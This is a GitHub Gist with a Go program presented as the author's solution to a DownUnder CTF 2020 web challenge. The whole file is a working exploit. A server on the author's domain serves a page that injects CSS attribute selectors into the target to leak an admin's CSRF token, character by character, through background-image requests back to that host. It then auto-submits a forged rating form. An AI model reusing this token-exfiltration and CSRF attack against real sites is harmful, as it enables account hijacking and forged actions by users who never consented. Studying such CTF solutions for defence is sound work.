Created
September 20, 2020 10:30
-
-
Save adamyi/2972836d0971cf8c6f86cdaffa814dec to your computer and use it in GitHub Desktop.
My solution for design-comp challenge in DownUnder CTF 2020
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"crypto/tls" | |
"log" | |
"net/http" | |
"github.com/gorilla/websocket" | |
"golang.org/x/crypto/acme/autocert" | |
) | |
var csrf chan string | |
var upgrader = websocket.Upgrader{ | |
ReadBufferSize: 1024, | |
WriteBufferSize: 1024, | |
CheckOrigin: func(r *http.Request) bool { return true }, | |
} | |
const payload = ` | |
<html><body><script> | |
const childwin = window.open('https://chal.duc.tf:30105/playground/fcd3c750-067c-4fa6-97ae-d398e4ff4ef6', 'haha', 'height=300px, width=500px'); | |
setTimeout(function() { | |
const socket = new WebSocket('wss://demo.nsa.group/ws'); | |
socket.addEventListener('message', async function (event) { | |
const csrf = event.data; | |
console.log(csrf); | |
if (csrf.length < 24) { | |
var msg = "#rater {display: block !important;}"; | |
for (var i = 0; i < 256; i++) { | |
var ncsrf; | |
if (i < 16) { | |
ncsrf = csrf + "0" + i.toString(16); | |
} else { | |
ncsrf = csrf + i.toString(16); | |
} | |
msg += "\ninput[value^='" + ncsrf + "'] ~ * ~ * ~ * {background: url(https://demo.nsa.group/csrf?c=" + ncsrf + ") !important;}"; | |
} | |
childwin.postMessage({action:'preview', css: msg}, '*'); | |
} else { | |
const form = document.createElement('form'); | |
form.method = 'POST'; | |
form.action = 'https://chal.duc.tf:30105/admin/rate'; | |
const csrfField = document.createElement('input'); | |
csrfField.type = 'hidden'; | |
csrfField.name = 'csrf'; | |
csrfField.value = csrf; | |
form.appendChild(csrfField); | |
const userField = document.createElement('input'); | |
userField.type = 'hidden'; | |
userField.name = 'user'; | |
userField.value = 'fcd3c750-067c-4fa6-97ae-d398e4ff4ef6'; | |
form.appendChild(userField); | |
const scoreField = document.createElement('input'); | |
scoreField.type = 'hidden'; | |
scoreField.name = 'score'; | |
scoreField.value = '10'; | |
form.appendChild(scoreField); | |
document.body.appendChild(form); | |
form.submit(); | |
} | |
}); | |
}, 200); | |
</script></body></html> | |
` | |
func wsEndpoint(w http.ResponseWriter, r *http.Request) { | |
ws, err := upgrader.Upgrade(w, r, nil) | |
if err != nil { | |
log.Println(err) | |
return | |
} | |
log.Println("Client Connected") | |
// clean out old data | |
select { | |
case <-csrf: | |
default: | |
} | |
c := "" | |
for { | |
log.Printf("Sending %s", c) | |
if err = ws.WriteMessage(1, []byte(c)); err != nil { | |
log.Println(err) | |
} | |
c = <-csrf | |
} | |
} | |
func stealCsrf(w http.ResponseWriter, r *http.Request) { | |
r.ParseForm() | |
c := r.URL.Query().Get("c") | |
log.Printf("Received %s", c) | |
csrf <- c | |
} | |
func hack(w http.ResponseWriter, r *http.Request) { | |
w.Header().Add("Content-Type", "text/html") | |
w.Write([]byte(payload)) | |
} | |
func main() { | |
csrf = make(chan string, 1) | |
http.HandleFunc("/", hack) | |
http.HandleFunc("/ws", wsEndpoint) | |
http.HandleFunc("/csrf", stealCsrf) | |
certManager := autocert.Manager{ | |
Prompt: autocert.AcceptTOS, | |
HostPolicy: autocert.HostWhitelist("demo.nsa.group"), | |
Cache: autocert.DirCache("./"), | |
} | |
server := &http.Server{ | |
Addr: ":https", | |
TLSConfig: &tls.Config{ | |
GetCertificate: certManager.GetCertificate, | |
}, | |
} | |
go func() { | |
h := certManager.HTTPHandler(nil) | |
log.Fatal(http.ListenAndServe(":http", h)) | |
}() | |
log.Fatal(server.ListenAndServeTLS("", "")) | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment